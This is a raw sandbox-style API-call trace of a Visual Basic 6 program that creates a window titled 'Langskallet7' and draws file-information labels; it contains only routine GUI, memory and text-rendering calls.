[0083.764] IMalloc:Alloc (This=0x755966bc, cb=0x68) returned 0x5adcf0 [0083.764] IMalloc:GetSize (This=0x755966bc, pv=0x5adcf0) returned 0x68 [0083.764] GetCurrentThreadId () returned 0x97c [0083.764] GetCurrentThreadId () returned 0x97c [0083.764] GetCurrentThreadId () returned 0x97c [0083.765] GetCurrentThreadId () returned 0x97c [0083.765] GetCurrentThreadId () returned 0x97c [0083.765] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0xb4 [0083.765] GetVersionExA (in: lpVersionInformation=0x18fa7c*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x1545d0c, dwMinorVersion=0x18f9cc, dwBuildNumber=0x18fd00, dwPlatformId=0x18ff70, szCSDVersion="Í\x1e.wôÓ\x1c") | out: lpVersionInformation=0x18fa7c*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0083.765] GetKeyboardLayout (idThread=0x0) returned 0x4090409 [0083.765] OleCreateFontIndirect () returned 0x0 [0083.766] lstrlenA (lpString="Langskallet7") returned 12 [0083.766] LoadIconA (hInstance=0x72940000, lpIconName=0x4b1) returned 0x800ad [0083.766] OleCreatePictureIndirect () returned 0x0 [0083.766] lstrlenA (lpString="Langskallet7") returned 12 [0083.766] lstrlenA (lpString="ThunderRT6") returned 10 [0083.766] lstrcpyA (in: lpString1=0x18fab8, lpString2="ThunderRT6" | out: lpString1="ThunderRT6") returned="ThunderRT6" [0083.766] lstrlenA (lpString="ThunderRT6Form") returned 14 [0083.766] lstrcpynA (in: lpString1=0x18fac6, lpString2="DC", iMaxLength=116 | out: lpString1="DC") returned="DC" [0083.766] lstrlenA (lpString="ThunderRT6") returned 10 [0083.766] lstrcpyA (in: lpString1=0x18fa4c, lpString2="ThunderRT6" | out: lpString1="ThunderRT6") returned="ThunderRT6" [0083.766] GetClassInfoA (in: hInstance=0x72940000, lpClassName="ThunderRT6Form", lpWndClass=0x18fa78 | out: lpWndClass=0x18fa78) returned 0 [0083.766] LoadCursorA (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0083.767] RegisterClassA (lpWndClass=0x18fa78) returned 0xe3c19c [0083.767] lstrlenA (lpString="ThunderRT6") returned 10 [0083.767] lstrcpyA (in: lpString1=0x18fa4c, lpString2="ThunderRT6" | out: lpString1="ThunderRT6") returned="ThunderRT6" [0083.767] lstrlenA (lpString="ThunderRT6Form") returned 14 [0083.767] lstrcpynA (in: lpString1=0x18fa5a, lpString2="DC", iMaxLength=29 | out: lpString1="DC") returned="DC" [0083.767] RegisterClassA (lpWndClass=0x18fa78) returned 0xc19d [0083.767] AdjustWindowRectEx (in: lpRect=0x18fb78, dwStyle=0x2cb0000, bMenu=0, dwExStyle=0x0 | out: lpRect=0x18fb78) returned 1 [0083.767] CreateWindowExA (dwExStyle=0x0, lpClassName=0xc19d, lpWindowName="Langskallet7", dwStyle=0x2cb0000, X=302, Y=284, nWidth=342, nHeight=229, hWndParent=0x40228, hMenu=0x0, hInstance=0x72940000, lpParam=0x0) returned 0x40222 [0083.767] NtdllDefWindowProc_A (hWnd=0x40222, Msg=0x81, wParam=0x0, lParam=0x18f69c) returned 0x1 [0083.767] NtdllDefWindowProc_A (hWnd=0x40222, Msg=0x83, wParam=0x0, lParam=0x18f688) returned 0x0 [0083.768] GetSystemMenu (hWnd=0x40222, bRevert=0) returned 0x30211 [0083.769] SetWindowContextHelpId (param_1=0x40222, param_2=0xffffffff) returned 1 [0083.769] NtdllDefWindowProc_A (hWnd=0x40222, Msg=0x1, wParam=0x0, lParam=0x18f69c) returned 0x0 [0083.769] GetDC (hWnd=0x40222) returned 0x46010924 [0083.769] GetTextMetricsA (in: hdc=0x46010924, lptm=0x18fa64 | out: lptm=0x18fa64) returned 1 [0083.769] SetBkMode (hdc=0x46010924, mode=1) returned 2 [0083.769] OleTranslateColor () returned 0x0 [0083.770] SetBkColor (hdc=0x46010924, color=0xf0f0f0) returned 0xffffff [0083.770] OleTranslateColor () returned 0x0 [0083.770] SetTextColor (hdc=0x46010924, color=0x0) returned 0x0 [0083.770] OleTranslateColor () returned 0x0 [0083.770] CreatePen (iStyle=0, cWidth=1, color=0x0) returned 0x33300945 [0083.770] SelectObject (hdc=0x46010924, h=0x33300945) returned 0x1b00017 [0083.770] SelectObject (hdc=0x46010924, h=0x1900011) returned 0x1900010 [0083.770] ClientToScreen (in: hWnd=0x40222, lpPoint=0x18fa44 | out: lpPoint=0x18fa44) returned 1 [0083.770] SetBrushOrgEx (in: hdc=0x46010924, x=1, y=5, lppt=0x0 | out: lppt=0x0) returned 1 [0083.770] UnrealizeObject (h=0x1900015) returned 1 [0083.770] SelectObject (hdc=0x46010924, h=0x1900015) returned 0x1900011 [0083.770] SelectObject (hdc=0x46010924, h=0x6e0a08c7) returned 0x18a002e [0083.770] GetTextMetricsA (in: hdc=0x46010924, lptm=0x18f858 | out: lptm=0x18f858) returned 1 [0083.770] GetClientRect (in: hWnd=0x40222, lpRect=0x18fbf8 | out: lpRect=0x18fbf8) returned 1 [0083.770] MapWindowPoints (in: hWndFrom=0x40222, hWndTo=0x0, lpPoints=0x18fbf8, cPoints=0x2 | out: lpPoints=0x18fbf8) returned 20250929 [0083.770] EqualRect (lprc1=0x18fbf8, lprc2=0x18fbd8) returned 1 [0083.770] SetEvent (hEvent=0xb4) returned 1 [0083.770] IsIconic (hWnd=0x40222) returned 0 [0083.770] SendMessageA (hWnd=0x40222, Msg=0x80, wParam=0x1, lParam=0x800ad) returned 0x0 [0083.770] NtdllDefWindowProc_A (hWnd=0x40222, Msg=0x80, wParam=0x1, lParam=0x800ad) returned 0x0 [0083.776] NtdllDefWindowProc_A (hWnd=0x40222, Msg=0x7f, wParam=0x2, lParam=0x0) returned 0x10217 [0083.777] IsIconic (hWnd=0x40222) returned 0 [0083.777] IsZoomed (hWnd=0x40222) returned 0 [0083.777] GetClientRect (in: hWnd=0x40222, lpRect=0x18fbec | out: lpRect=0x18fbec) returned 1 [0083.777] GetWindow (hWnd=0x40222, uCmd=0x5) returned 0x0 [0083.777] GetCurrentThreadId () returned 0x97c [0083.777] ShowWindow (hWnd=0x40222, nCmdShow=1) returned 0 [0083.777] NtdllDefWindowProc_A (hWnd=0x40222, Msg=0x18, wParam=0x1, lParam=0x0) returned 0x0 [0083.777] NtdllDefWindowProc_A (hWnd=0x40222, Msg=0x46, wParam=0x0, lParam=0x18fb3c) returned 0x0 [0083.777] NtdllDefWindowProc_A (hWnd=0x40228, Msg=0x46, wParam=0x0, lParam=0x18fb3c) returned 0x0 [0083.800] NtdllDefWindowProc_A (hWnd=0x40222, Msg=0x46, wParam=0x0, lParam=0x18fb3c) returned 0x0 [0083.801] NtdllDefWindowProc_A (hWnd=0x40228, Msg=0x46, wParam=0x0, lParam=0x18fb3c) returned 0x0 [0083.801] NtdllDefWindowProc_A (hWnd=0x40222, Msg=0x1c, wParam=0x1, lParam=0x958) returned 0x0 [0083.801] NtdllDefWindowProc_A (hWnd=0x40228, Msg=0x1c, wParam=0x1, lParam=0x958) returned 0x0 [0083.801] GetWindowLongA (hWnd=0x40224, nIndex=0) returned 5513372 [0083.801] NtdllDefWindowProc_A (hWnd=0x40222, Msg=0x86, wParam=0x1, lParam=0x0) returned 0x1 [0083.801] IsIconic (hWnd=0x40222) returned 0 [0083.801] GetFocus () returned 0x0 [0083.801] GetFocus () returned 0x0 [0083.801] IsWindowEnabled (hWnd=0x40222) returned 1 [0083.801] GetWindowThreadProcessId (in: hWnd=0x40222, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x97c [0083.801] GetCurrentThreadId () returned 0x97c [0083.801] SetFocus (hWnd=0x40222) returned 0x0 [0083.805] NtdllDefWindowProc_A (hWnd=0x40222, Msg=0x281, wParam=0x1, lParam=0xc000000f) returned 0x0 [0083.805] NtdllDefWindowProc_A (hWnd=0x40222, Msg=0x282, wParam=0x2, lParam=0x0) returned 0x0 [0083.806] IsIconic (hWnd=0x40222) returned 0 [0083.806] GetFocus () returned 0x40222 [0083.806] NtdllDefWindowProc_A (hWnd=0x40222, Msg=0x7, wParam=0x0, lParam=0x0) returned 0x0 [0083.806] IsWindowEnabled (hWnd=0x40222) returned 1 [0083.806] PostMessageA (hWnd=0x40222, Msg=0x100e, wParam=0xa, lParam=0x0) returned 1 [0083.806] IsIconic (hWnd=0x40222) returned 0 [0083.806] PostMessageA (hWnd=0x40222, Msg=0x100e, wParam=0xe, lParam=0x0) returned 1 [0083.806] PostMessageA (hWnd=0x40222, Msg=0x105a, wParam=0x0, lParam=0x0) returned 1 [0083.806] NtdllDefWindowProc_A (hWnd=0x40222, Msg=0x85, wParam=0x1, lParam=0x0) returned 0x0 [0083.809] IsIconic (hWnd=0x40222) returned 0 [0083.809] IsIconic (hWnd=0x40222) returned 0 [0083.809] GetParent (hWnd=0x40222) returned 0x0 [0083.809] GetWindowRect (in: hWnd=0x40222, lpRect=0x18f764 | out: lpRect=0x18f764) returned 1 [0083.809] NtdllDefWindowProc_A (hWnd=0x40222, Msg=0x47, wParam=0x0, lParam=0x18fb3c) returned 0x0 [0083.809] GetWindowLongA (hWnd=0x40222, nIndex=-16) returned 382402560 [0083.809] GetClientRect (in: hWnd=0x40222, lpRect=0x18f7d4 | out: lpRect=0x18f7d4) returned 1 [0083.809] MapWindowPoints (in: hWndFrom=0x40222, hWndTo=0x0, lpPoints=0x18f7d4, cPoints=0x2 | out: lpPoints=0x18f7d4) returned 20250929 [0083.810] NtdllDefWindowProc_A (hWnd=0x40222, Msg=0x83, wParam=0x1, lParam=0x18f720) returned 0x0 [0083.816] NtdllDefWindowProc_A (hWnd=0x40222, Msg=0x85, wParam=0x1, lParam=0x0) returned 0x0 [0083.817] IsIconic (hWnd=0x40222) returned 0 [0083.817] IsIconic (hWnd=0x40222) returned 0 [0083.817] NtdllDefWindowProc_A (hWnd=0x40228, Msg=0x47, wParam=0x0, lParam=0x18fb3c) returned 0x0 [0083.817] IsWindowVisible (hWnd=0x40222) returned 1 [0083.817] IsIconic (hWnd=0x40222) returned 0 [0083.817] IsZoomed (hWnd=0x40222) returned 0 [0083.817] NtdllDefWindowProc_A (hWnd=0x40222, Msg=0x5, wParam=0x0, lParam=0xc90150) returned 0x0 [0083.817] GetClientRect (in: hWnd=0x40222, lpRect=0x18f7ac | out: lpRect=0x18f7ac) returned 1 [0083.817] GetWindow (hWnd=0x40222, uCmd=0x5) returned 0x0 [0083.817] NtdllDefWindowProc_A (hWnd=0x40222, Msg=0x3, wParam=0x0, lParam=0x1350131) returned 0x0 [0083.817] GetCurrentThreadId () returned 0x97c [0083.817] PostThreadMessageA (idThread=0x97c, Msg=0x1069, wParam=0x0, lParam=0x0) returned 1 [0083.817] GetCurrentProcessId () returned 0x7a8 [0083.817] PeekMessageA (in: lpMsg=0x18fe58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fe58) returned 1 [0083.818] NtdllDefWindowProc_A (hWnd=0x40222, Msg=0x88, wParam=0x4, lParam=0x0) returned 0x0 [0083.819] IsWindow (hWnd=0x40222) returned 1 [0083.819] GetWindowLongA (hWnd=0x40222, nIndex=-16) returned 382402560 [0083.819] IsIconic (hWnd=0x40222) returned 0 [0083.819] GetParent (hWnd=0x40222) returned 0x0 [0083.819] TranslateMessage (lpMsg=0x18fe58) returned 0 [0083.819] DispatchMessageA (lpMsg=0x18fe58) returned 0x0 [0083.819] PeekMessageA (in: lpMsg=0x18fe58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fe58) returned 1 [0083.819] IsWindow (hWnd=0x40222) returned 1 [0083.819] GetWindowLongA (hWnd=0x40222, nIndex=-16) returned 382402560 [0083.819] IsIconic (hWnd=0x40222) returned 0 [0083.819] GetParent (hWnd=0x40222) returned 0x0 [0083.819] TranslateMessage (lpMsg=0x18fe58) returned 0 [0083.819] DispatchMessageA (lpMsg=0x18fe58) returned 0x0 [0083.819] PeekMessageA (in: lpMsg=0x18fe58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fe58) returned 1 [0083.819] IsWindow (hWnd=0x40222) returned 1 [0083.819] GetWindowLongA (hWnd=0x40222, nIndex=-16) returned 382402560 [0083.819] IsIconic (hWnd=0x40222) returned 0 [0083.819] GetParent (hWnd=0x40222) returned 0x0 [0083.819] TranslateMessage (lpMsg=0x18fe58) returned 0 [0083.819] DispatchMessageA (lpMsg=0x18fe58) returned 0x0 [0083.819] GetActiveWindow () returned 0x40222 [0083.819] GetWindowThreadProcessId (in: hWnd=0x40222, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x97c [0083.819] GetFocus () returned 0x40222 [0083.819] PeekMessageA (in: lpMsg=0x18fe58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fe58) returned 1 [0083.819] TranslateMessage (lpMsg=0x18fe58) returned 0 [0083.819] DispatchMessageA (lpMsg=0x18fe58) returned 0x0 [0083.819] PeekMessageA (in: lpMsg=0x18fe58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fe58) returned 1 [0083.820] IsWindow (hWnd=0x40222) returned 1 [0083.820] GetWindowLongA (hWnd=0x40222, nIndex=-16) returned 382402560 [0083.820] IsIconic (hWnd=0x40222) returned 0 [0083.820] GetParent (hWnd=0x40222) returned 0x0 [0083.820] TranslateMessage (lpMsg=0x18fe58) returned 0 [0083.820] DispatchMessageA (lpMsg=0x18fe58) [0083.820] IsIconic (hWnd=0x40222) returned 0 [0083.820] IsIconic (hWnd=0x40222) returned 0 [0083.820] BeginPaint (in: hWnd=0x40222, lpPaint=0x18fa00 | out: lpPaint=0x18fa00) returned 0x46010924 [0083.820] GetClientRect (in: hWnd=0x40222, lpRect=0x18fa40 | out: lpRect=0x18fa40) returned 1 [0083.820] OleTranslateColor () returned 0x0 [0083.820] OleTranslateColor () returned 0x0 [0083.820] CreateSolidBrush (color=0xf0f0f0) returned 0x5c1006ff [0083.820] OleTranslateColor () returned 0x0 [0083.820] OleTranslateColor () returned 0x0 [0083.820] SetTextColor (hdc=0x46010924, color=0x0) returned 0x0 [0083.820] SetBkColor (hdc=0x46010924, color=0xf0f0f0) returned 0xf0f0f0 [0083.820] FillRect (hDC=0x46010924, lprc=0x18fa40, hbr=0x5c1006ff) returned 1 [0083.820] SetTextColor (hdc=0x46010924, color=0x0) returned 0x0 [0083.820] SetBkColor (hdc=0x46010924, color=0xf0f0f0) returned 0xf0f0f0 [0083.820] EndPaint (hWnd=0x40222, lpPaint=0x18fa00) returned 1 [0083.820] IsWindowVisible (hWnd=0x40222) returned 1 [0083.820] IsIconic (hWnd=0x40222) returned 0 [0083.820] IsZoomed (hWnd=0x40222) returned 0 [0083.820] ShowWindow (hWnd=0x40222, nCmdShow=0) returned 1 [0083.820] NtdllDefWindowProc_A (hWnd=0x40222, Msg=0x18, wParam=0x0, lParam=0x0) returned 0x0 [0083.821] NtdllDefWindowProc_A (hWnd=0x40222, Msg=0x46, wParam=0x0, lParam=0x18f374) returned 0x0 [0083.821] NtdllDefWindowProc_A (hWnd=0x40228, Msg=0x46, wParam=0x0, lParam=0x18f374) returned 0x0 [0083.822] GetParent (hWnd=0x40222) returned 0x0 [0083.822] GetWindowRect (in: hWnd=0x40222, lpRect=0x18ef9c | out: lpRect=0x18ef9c) returned 1 [0083.822] NtdllDefWindowProc_A (hWnd=0x40222, Msg=0x47, wParam=0x0, lParam=0x18f374) returned 0x0 [0083.822] GetWindowLongA (hWnd=0x40222, nIndex=-16) returned 113967104 [0083.822] GetClientRect (in: hWnd=0x40222, lpRect=0x18f00c | out: lpRect=0x18f00c) returned 1 [0083.822] MapWindowPoints (in: hWndFrom=0x40222, hWndTo=0x0, lpPoints=0x18f00c, cPoints=0x2 | out: lpPoints=0x18f00c) returned 20250929 [0083.829] NtdllDefWindowProc_A (hWnd=0x40222, Msg=0x86, wParam=0x0, lParam=0x0) returned 0x1 [0083.829] GetFocus () returned 0x40222 [0083.829] GetClassInfoA (in: hInstance=0x72940000, lpClassName="COMBOBOX", lpWndClass=0x18eff0 | out: lpWndClass=0x18eff0) returned 1 [0083.829] NtdllDefWindowProc_A (hWnd=0x40222, Msg=0x1c, wParam=0x0, lParam=0x958) returned 0x0 [0083.829] NtdllDefWindowProc_A (hWnd=0x40228, Msg=0x1c, wParam=0x0, lParam=0x958) returned 0x0 [0083.829] GetWindowLongA (hWnd=0x40224, nIndex=0) returned 5513372 [0083.829] NtdllDefWindowProc_A (hWnd=0x40222, Msg=0x8, wParam=0x0, lParam=0x0) returned 0x0 [0083.830] NtdllDefWindowProc_A (hWnd=0x40222, Msg=0x281, wParam=0x0, lParam=0xc000000f) returned 0x0 [0083.830] NtdllDefWindowProc_A (hWnd=0x40222, Msg=0x282, wParam=0x1, lParam=0x0) returned 0x0 [0083.830] VarAnd (in: pvarLeft=0x18f6f4, pvarRight=0x18f704, pvarResult=0x18f6e4 | out: pvarResult=0x18f6e4) returned 0x0 [0083.830] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Full filename: ", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0083.830] InvalidateRect (hWnd=0x40222, lpRect=0x0, bErase=1) returned 1 [0083.830] CreateCompatibleBitmap (hdc=0x46010924, cx=1440, cy=900) returned 0xffffffffc8050913 [0083.832] CreateCompatibleDC (hdc=0x46010924) returned 0xc8010950 [0083.832] SelectObject (hdc=0xc8010950, h=0xc8050913) returned 0x185000f [0083.832] SetBkMode (hdc=0xc8010950, mode=1) returned 2 [0083.832] OleTranslateColor () returned 0x0 [0083.832] SetBkColor (hdc=0xc8010950, color=0xf0f0f0) returned 0xffffff [0083.832] OleTranslateColor () returned 0x0 [0083.832] UnrealizeObject (h=0x5c1006ff) returned 1 [0083.832] FillRect (hDC=0xc8010950, lprc=0x18f5a8, hbr=0x5c1006ff) returned 1 [0083.832] OleCreatePictureIndirect () returned 0x0 [0083.833] SelectObject (hdc=0xc8010950, h=0x33300945) returned 0x1b00017 [0083.833] SelectObject (hdc=0xc8010950, h=0x6e0a08c7) returned 0x18a002e [0083.833] SelectObject (hdc=0xc8010950, h=0x1900011) returned 0x1900010 [0083.833] SetBrushOrgEx (in: hdc=0xc8010950, x=0, y=0, lppt=0x0 | out: lppt=0x0) returned 1 [0083.833] UnrealizeObject (h=0x1900015) returned 1 [0083.833] SelectObject (hdc=0xc8010950, h=0x1900015) returned 0x1900011 [0083.833] SetBkMode (hdc=0xc8010950, mode=1) returned 1 [0083.833] OleTranslateColor () returned 0x0 [0083.833] SetBkColor (hdc=0xc8010950, color=0xf0f0f0) returned 0xf0f0f0 [0083.833] OleTranslateColor () returned 0x0 [0083.833] SetTextColor (hdc=0xc8010950, color=0x0) returned 0x0 [0083.833] GetROP2 (hdc=0x46010924) returned 13 [0083.833] SetROP2 (hdc=0xc8010950, rop2=13) returned 13 [0083.833] SelectObject (hdc=0x46010924, h=0x1b00016) returned 0x33300945 [0083.833] SelectObject (hdc=0x46010924, h=0x18a002e) returned 0x6e0a08c7 [0083.833] SelectObject (hdc=0x46010924, h=0x1900015) returned 0x1900015 [0083.833] SelectPalette (hdc=0x46010924, hPal=0x188000b, bForceBkgd=1) returned 0x188000b [0083.833] OleTranslateColor () returned 0x0 [0083.833] OleTranslateColor () returned 0x0 [0083.833] UnrealizeObject (h=0x5c1006ff) returned 1 [0083.833] OleTranslateColor () returned 0x0 [0083.833] OleTranslateColor () returned 0x0 [0083.833] SetTextColor (hdc=0xc8010950, color=0x0) returned 0x0 [0083.833] SetBkColor (hdc=0xc8010950, color=0xf0f0f0) returned 0xf0f0f0 [0083.833] FillRect (hDC=0xc8010950, lprc=0x18f5cc, hbr=0x5c1006ff) returned 1 [0083.833] SetTextColor (hdc=0xc8010950, color=0x0) returned 0x0 [0083.833] SetBkColor (hdc=0xc8010950, color=0xf0f0f0) returned 0xf0f0f0 [0083.833] SysStringLen (param_1="Full filename: ") returned 0xf [0083.833] SysStringLen (param_1="Full filename: ") returned 0xf [0083.833] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Full filename: ", cchWideChar=15, lpMultiByteStr=0x18f5e4, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Full filename: ", lpUsedDefaultChar=0x0) returned 15 [0083.833] GetTextExtentPoint32A (in: hdc=0xc8010950, lpString="Full filename: ", c=15, psizl=0x18f620 | out: psizl=0x18f620) returned 1 [0083.834] TabbedTextOutA (hdc=0xc8010950, x=0, y=0, lpString="Full filename: ", chCount=15, nTabPositions=1, lpnTabStopPositions=0x18f62c, nTabOrigin=0) returned 852032 [0083.834] InvalidateRect (hWnd=0x40222, lpRect=0x0, bErase=1) returned 1 [0083.834] SysStringLen (param_1="\r\n") returned 0x2 [0083.834] SysStringLen (param_1="\r\n") returned 0x2 [0083.835] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x18f5fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\not·\x8d\x99r", lpUsedDefaultChar=0x0) returned 2 [0083.835] GetTextExtentPoint32A (in: hdc=0xc8010950, lpString="\r\not·\x8d\x99r", c=0, psizl=0x18f620 | out: psizl=0x18f620) returned 1 [0083.835] TabbedTextOutA (hdc=0xc8010950, x=64, y=0, lpString="\r\not·\x8d\x99r", chCount=0, nTabPositions=1, lpnTabStopPositions=0x18f62c, nTabOrigin=0) returned 0 [0083.835] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="File version: ", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0083.835] InvalidateRect (hWnd=0x40222, lpRect=0x0, bErase=1) returned 1 [0083.835] SysStringLen (param_1="File version: ") returned 0xe [0083.835] SysStringLen (param_1="File version: ") returned 0xe [0083.835] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="File version: ", cchWideChar=14, lpMultiByteStr=0x18f5e4, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="File version: \x18", lpUsedDefaultChar=0x0) returned 14 [0083.835] GetTextExtentPoint32A (in: hdc=0xc8010950, lpString="File version: \x18", c=14, psizl=0x18f620 | out: psizl=0x18f620) returned 1 [0083.835] TabbedTextOutA (hdc=0xc8010950, x=0, y=13, lpString="File version: \x18", chCount=14, nTabPositions=1, lpnTabStopPositions=0x18f62c, nTabOrigin=0) returned 852027 [0083.835] InvalidateRect (hWnd=0x40222, lpRect=0x0, bErase=1) returned 1 [0083.835] SysStringLen (param_1="\r\n") returned 0x2 [0083.835] SysStringLen (param_1="\r\n") returned 0x2 [0083.835] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x18f5fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\not·\x8d\x99r", lpUsedDefaultChar=0x0) returned 2 [0083.835] GetTextExtentPoint32A (in: hdc=0xc8010950, lpString="\r\not·\x8d\x99r", c=0, psizl=0x18f620 | out: psizl=0x18f620) returned 1 [0083.835] TabbedTextOutA (hdc=0xc8010950, x=59, y=13, lpString="\r\not·\x8d\x99r", chCount=0, nTabPositions=1, lpnTabStopPositions=0x18f62c, nTabOrigin=0) returned 0 [0083.835] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Product version: ", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0083.835] InvalidateRect (hWnd=0x40222, lpRect=0x0, bErase=1) returned 1 [0083.835] SysStringLen (param_1="Product version: ") returned 0x11 [0083.835] SysStringLen (param_1="Product version: ") returned 0x11 [0083.835] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Product version: ", cchWideChar=17, lpMultiByteStr=0x18f5e0, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Product version: ö\x18", lpUsedDefaultChar=0x0) returned 17 [0083.836] GetTextExtentPoint32A (in: hdc=0xc8010950, lpString="Product version: ö\x18", c=17, psizl=0x18f620 | out: psizl=0x18f620) returned 1 [0083.836] TabbedTextOutA (hdc=0xc8010950, x=0, y=26, lpString="Product version: ö\x18", chCount=17, nTabPositions=1, lpnTabStopPositions=0x18f62c, nTabOrigin=0) returned 852048 [0083.836] InvalidateRect (hWnd=0x40222, lpRect=0x0, bErase=1) returned 1 [0083.836] SysStringLen (param_1="\r\n") returned 0x2 [0083.836] SysStringLen (param_1="\r\n") returned 0x2 [0083.836] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x18f5fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\not·\x8d\x99r", lpUsedDefaultChar=0x0) returned 2 [0083.836] GetTextExtentPoint32A (in: hdc=0xc8010950, lpString="\r\not·\x8d\x99r", c=0, psizl=0x18f620 | out: psizl=0x18f620) returned 1 [0083.836] TabbedTextOutA (hdc=0xc8010950, x=80, y=26, lpString="\r\not·\x8d\x99r", chCount=0, nTabPositions=1, lpnTabStopPositions=0x18f62c, nTabOrigin=0) returned 0 [0083.836] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="File flags: ", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0083.836] InvalidateRect (hWnd=0x40222, lpRect=0x0, bErase=1) returned 1 [0083.836] SysStringLen (param_1="File flags: ") returned 0xc [0083.836] SysStringLen (param_1="File flags: ") returned 0xc [0083.836] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="File flags: ", cchWideChar=12, lpMultiByteStr=0x18f5e8, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="File flags: z\x8d\x99rXö\x18", lpUsedDefaultChar=0x0) returned 12 [0083.836] GetTextExtentPoint32A (in: hdc=0xc8010950, lpString="File flags: z\x8d\x99rXö\x18", c=12, psizl=0x18f620 | out: psizl=0x18f620) returned 1 [0083.836] TabbedTextOutA (hdc=0xc8010950, x=0, y=39, lpString="File flags: z\x8d\x99rXö\x18", chCount=12, nTabPositions=1, lpnTabStopPositions=0x18f62c, nTabOrigin=0) returned 852015 [0083.836] InvalidateRect (hWnd=0x40222, lpRect=0x0, bErase=1) returned 1 [0083.836] SysStringLen (param_1="\r\n") returned 0x2 [0083.836] SysStringLen (param_1="\r\n") returned 0x2 [0083.836] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x18f5fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\not·\x8d\x99r", lpUsedDefaultChar=0x0) returned 2 [0083.836] GetTextExtentPoint32A (in: hdc=0xc8010950, lpString="\r\not·\x8d\x99r", c=0, psizl=0x18f620 | out: psizl=0x18f620) returned 1 [0083.836] TabbedTextOutA (hdc=0xc8010950, x=47, y=39, lpString="\r\not·\x8d\x99r", chCount=0, nTabPositions=1, lpnTabStopPositions=0x18f62c, nTabOrigin=0) returned 0 [0083.836] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="File OS: Unknown", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0083.836] InvalidateRect (hWnd=0x40222, lpRect=0x0, bErase=1) returned 1 [0083.836] SysStringLen (param_1="File OS: Unknown") returned 0x10 [0083.836] SysStringLen (param_1="File OS: Unknown") returned 0x10 [0083.837] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="File OS: Unknown", cchWideChar=16, lpMultiByteStr=0x18f5e0, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="File OS: UnknownXö\x18", lpUsedDefaultChar=0x0) returned 16 [0083.837] GetTextExtentPoint32A (in: hdc=0xc8010950, lpString="File OS: UnknownXö\x18", c=16, psizl=0x18f620 | out: psizl=0x18f620) returned 1 [0083.837] TabbedTextOutA (hdc=0xc8010950, x=0, y=52, lpString="File OS: UnknownXö\x18", chCount=16, nTabPositions=1, lpnTabStopPositions=0x18f62c, nTabOrigin=0) returned 852054 [0083.837] InvalidateRect (hWnd=0x40222, lpRect=0x0, bErase=1) returned 1 [0083.837] SysStringLen 